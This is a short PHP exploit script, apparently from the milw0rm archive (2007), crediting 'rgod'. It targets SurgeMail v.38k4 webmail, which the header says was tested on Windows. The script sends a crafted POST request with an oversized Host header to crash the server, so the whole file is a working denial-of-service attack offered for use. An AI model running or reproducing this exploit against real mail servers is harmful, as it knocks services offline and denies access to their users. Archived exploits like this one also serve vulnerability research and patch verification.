31 lines
No EOL
732 B
PHP
31 lines
No EOL
732 B
PHP
<?php
|
|
/*
|
|
SurgeMail v.38k4 webmail Host header denial of service exploit
|
|
tested against the windows version
|
|
|
|
rgod
|
|
*/
|
|
|
|
dl("php_curl.so");
|
|
$url = "http://192.168.0.1";
|
|
$puf=str_repeat(0xff,0xfff);
|
|
|
|
$header ="POST / HTTP/1.0\r\n";
|
|
$header.="Host: $puf\r\n";
|
|
$header.="Connection: Close\r\n\r\n";
|
|
|
|
$ch = curl_init();
|
|
curl_setopt($ch, CURLOPT_URL,$url);
|
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
|
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
|
|
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
|
|
|
|
$data = curl_exec($ch); if (curl_errno($ch)) {
|
|
print curl_error($ch)."\n";
|
|
} else {
|
|
curl_close($ch);
|
|
}
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2007-12-18]
|